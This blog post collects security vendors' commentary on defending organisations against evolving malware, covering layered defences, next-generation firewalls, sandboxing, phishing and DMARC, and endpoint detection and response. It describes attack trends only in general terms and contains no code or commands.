2 years ago - Blog Posts
Combating malware means going way beyond locating suspicious programs on servers and workstations, and detecting and interfering with the use of malware on the network
All too often, many organisations make the mistake of treating malware infections as a series of independent occurrences. Worst-case scenario? A malicious program is discovered and IT simply cleans it up or rebuilds the affected host... and then moves on with routine operational tasks. That is just not good enough for any business that wants to stay secure. Such an ad hoc approach fails to protect an enterprise from the increasingly aggressive and innovative attack tactics now employed by malware authors. It is their stock in trade to design malware that simply bypasses defences, evade detection and resist the most stringent efforts to remove it. As Stuart Brown, principal solutions architect at Redcentric, points out, a new approach is required that prevents malware entering your network or at the very least enables you to detect it at the point of entry.
"People call this the 'kill chain' of an advanced persistent threat (APT) and you need to take a holistic approach to security defence, rather than a series of discreet solutions," he advises. "For security technology to work, it needs to cover three essential elements: it needs to be able to detect malware entering the organisation; it needs to detect malware traffic traversing across the internal network; and then it needs to detect malware on the way out.
"In the past, companies have simply added appliances to the network that deal with each of these in isolation," he adds. "It's likely any one organisation will have a combination of firewalls, virus protection and intrusion detection amongst other security solutions. For many, the answer to a raised threat has been to simply stick another security appliance on the network.
These traditional approaches, however, have become limited as malware becomes more sophisticated. "First, each appliance sits in isolation. They're typically provided by different manufacturers and rarely are they capable of integrating. This limits the visibility and control that the IT team has over what is really happening on their network. This lack of visibility often results in the IT team having to check each individual log or report of each device to identify if there's a problem."
Some appliances also provide a blanket approach that doesn't allow for the nuances of malware. "For example, most network firewalls are traditional port and protocol based. This means that the firewall is programmed to let in a certain type of traffic that comes via a port - let's say https (encrypted) traffic via port 443. That means all traffic via port 443 is allowed in - whether it's good or bad. The firewall doesn't check traffic to see what it is. It's just as likely to be a piece of malware dressed up as an https request as it is to be genuine https traffic. And as malware has moved away from social applications and is more often embedded in business critical applications, it's now more difficult to protect against," Brown points out.
What we need in the fight against the kill chain of APT is a new capability: 'loop protection'. This takes all of the tools available to a security team - from firewalls, malware & APT detection, real-time analysis (sandboxing), endpoint protection, correlated log analysis and others - and combines them. This type of closed loop protection is available through next generation firewalls (NGFW). This involves a single box that can detect all traffic, identify if it's encrypted or not, what port it comes through using what protocol and scan - in real time - for malware and APT. If it's concerned about a piece of traffic, it then runs it through a virtual machine to see what it does and its impact. This is known as sandboxing.
"If it identifies the traffic as malware, it will apply an automated response, based on a set of rules that you've pre-determined. This 'spot, prove, react, prompt' reaction all happens in real time. This means you're protected before you know that there's an issue."
THINK ABOUT LAYERS!
"No organisation should rely solely on a single vendor solution. The reality is that each vendor may do well in a particular aspect but no single technology or product can ever offer a completely bulletproof solution to every threat," comments David Peters, technical director for ANSecurity. "This is a more prevalent issue now that attackers are using exploits designed to by-pass detection methods used by specific vendors. We always advise clients to think about multiple layers of complementary solutions that overlap slightly to provide a belt and braces approach.
"Simply having a security product deployed is not the end of the story. In many instances, when we are called in as security consultants post breach, our analysis uncovers a specific security product that may have been improperly configured, unpatched or simply not evolved with changes in the environment exposing a vulnerability that has been exploited. We recommend that organisations take an active approach with regular security system, training and process evaluations to keep pace with internal changes and external threats."
Since the first mass-market malware, the security industry has been in an "ongoing arms race" between attackers and defenders, Peters continues. "The types of attacks, the scope and scale of vulnerabilities, corresponding exploits and even distribution methods have kept pace with technological progressing. This cycle is unfortunately never ending and malware for profit has grown into a multibillion dollar industry. New approaches to delivering malware whilst evading detection are constantly evolving, along with the malware itself. Organisations need to continually re-evaluate sources of malware, a process that can been streamlined with certain security tools, but administrators need to keep up to date with new threat vectors and routinely test that the defences are set up to deal with the next wave of attacks."
SOPHISTICATED AND BELIEVABLE
John Wilson, field CTO, Agari, points to how, in the last five years, we've become far too familiar with the social engineering tactics and spam messages that hackers are using to spoof a company's domain and attempting to infect our computers with malware. "Advances in phishing and social engineering techniques that carry malware have come on leaps and bounds," he says. "Phishing attempts are no longer primitive and full of errors; they have become sophisticated and believable, making it almost impossible to identify that something is amiss. Email-borne malware attacks can vary greatly in form and content, with the malware either included as an attachment or embedded in a link. Malware distributors often keep the content as minimal as possible, trying to drive a click on the attachment or to their URL."
Brand-conscious organisations that want to use email to communicate with consumers need to ensure it is a secure channel, so that their brand is not used to trick consumers into infecting their devices with malware. "Companies must take the proper steps to prevent phishing emails supposedly coming from their brand, containing malicious links or attachments. Not only do phishing emails have a detrimental effect on the recipient, but also on the brand that the email has come from, whose reputation will become tarnished in the process," states Wilson.
Open standards like Domain Message Authentication Reporting and Conformance (DMARC) are emerging that allow savvy businesses to combat email vulnerability and remove the risk of an email containing malware ever reaching the intended recipient - their customers. "Those businesses that take this responsibility seriously and secure their email channel will soon benefit from greater consumer trust, fewer fraud losses, less operational overheads and a significantly reduced chance of their customers being victim to this latest threat," he adds.
Slawek Ligier, vice president of product development, Barracuda Networks, stresses how, as mass distribution started beoming less effective, malware developers created polymorphic code. "Although the mechanism used by the malware to achieve its objectives was the same, the file itself was slightly different each time it was sent. This resulted in a different signature and successful infiltration."
Changing malware from a widely distributed single file to something that changes just slightly for each payload is relatively easy, he says. "Creating malware that can evade all known defence mechanisms, stay undetected for a long period of time and achieve a more specific objective is far more challenging. But, as hard as it is to write advanced malware, it is significantly harder to detect these threats. Security software must avoid both false positives, as well as false negatives - crying wolf too many times results in alarms being ignored. Since signature comparison is no longer sufficient, defenders must deploy Advanced Threat Detection technologies, such as sandboxing, network cloaking and monitoring, to either stop malware from entering an organisation or to detect it before the damage is done."
As always, protecting all threat vectors is the best answer that organisations have to reduce the probability of being infected. "It starts with the protection of infiltration vectors - email, web, file transfer and USB. It continues with protection and detection at the endpoint, and detection of network anomalies - exploration, suspicious file transfers, communication with suspicious command and control servers etc.," Ligier adds. "Finally, any really valuable assets should be encrypted and keys stored securely. This way, even when the network is infiltrated and the event goes undetected, the damage is limited.
"In my experience, malware developers tend to experiment with a lot of different methods and attack vectors before discovering the best approach. True advanced targeted attacks rely on a series of techniques, in order to be successful. They combine social engineering with computer science. We are currently seeing a lot of very targeted phishing attempts. In the past, they were more direct, with links or attachments in the very first message.
"Modern email gateways are able to stop the majority of these, which has forced hackers to adopt a more subtle approach. They might start with completely innocent emails not asking for any action, just a response. Once trust is established, more detailed conversation and a request to take action follows. These types of attacks are very difficult to stop early. Only when the victim is about to be compromised, can security software come into play."
GAIN AND PROFIT
Thomas Fischer, principle threat researcher, Digital Guardian, also stresses how what has changed significantly of late is the methods that attackers use to deliver malware, necessitated by improvements in user awareness and detection. "We are seeing more targeted malware attacks for gain and profit, versus the general nuances malware of the past. Malware is also now delivered in multiple stages and vectors, so we might see an endpoint being comprised by both an exploit kit (to gain remote access) and ransomware simultaneously," he says.
The other area seeing rapid growth is attacks on non-traditional target platforms, such as mobile phones, MacOS, PCS (production control systems) and PoS (Point of Sale). This, he points out, reverts back to the ability to exploit for financial gains. So, what can be done to protect against these new types of attack? "User awareness is key. The more we train users to properly identify good versus bad attachments and websites, the less effective attacks will be. On the infrastructure front, organisations should adopt multi-layered security approaches, using network, application and endpoint security solutions. Implementing tried and tested DRP policies and backup strategies will also help to avoid significant loss of data and ensure data is recoverable, in the event of a ransomware attack."
What does the future hold? "We will continue to see malware evolve its methods of evasion, as businesses continue to invest in traditional detection methods. Memory-based malware will become more common, using built-in tools, such as powershell, to deliver them. The use of remote shells and control to remain undetected will be a big factor.
"Evasion techniques will also continue to improve with increased use of encryption, alongside implementation of sandbox detection to defeat solutions like FireEye, Cylance and Carbon Black," Fischer predicts. "Furthermore, the increased use of low-level hardware attacks will grow. By infected BIOS, firmware and hard drives, the attackers are able to obtain a longer persistence to their attacks."
Many organisations today lack the resources to conduct adequate forensics, once an infected system has been detected, states Scott Gainey, SVP & CMO, SentinelOne. "As a result, these initial discoveries (if detected at all) are often obscured in a long list of tasks managed by teams who lack both the staff and the tools to conduct a reasonable analysis. In the end, organisations often miss crucial signs that might indicate the existence of a much larger, more aggressive campaign. For over a decade, the security industry sat largely idle while cyber criminals and nations perfected new attack techniques," he comments.
More recently, the security industry began to mobilise in order to address this issue. "The focus initially began within the network, bringing to market a powerful set of new technologies, such as the next-generation firewall and network-based sandboxing aimed at detecting and preventing malicious activities that used more advanced obfuscation techniques to remain hidden.
"These new technologies proved valuable at reducing an organisation's attack surface and improving the overall catch rates of new threats," says Gainey." In the last two years, another major segment of the industry began to mobilise to address a major pain point at the endpoint. Even with these powerful new advancements within the network, organisations' endpoints still remained highly vulnerable to attack. This new mobilisation began with improved visibility and response mechanisms locally, bringing what Gartner refers to as endpoint detection and response (EDR) to quickly surface any activities that might be malicious in nature. Initially, EDR was positioned as a supplement to traditional antivirus. This was based on the viewpoint that antivirus had fallen woefully behind the cyber threat landscape and could no longer prevent the more sophisticated threats. The EDR market has since evolved, with new integrated platforms that offer combined threat detection, prevention and response capabilities."
Collectively, these technology advancements provide significant opportunity for organisations to accelerate the detection and prevention of advanced, targeted attacks, he warns. "Now the onus sits with the organisations to streamline their security operations to take advantage of these news tools. Increase use of automation to capture and eliminate the threats that constitute basic noise. Free the organisation to focus their time and energy on the critical 1%, and foster teaming with regular exercises to ensure adequate and proper response to sever incidents," he counsels.
Here is a link to the article: http://tinyurl.com/hhnk8go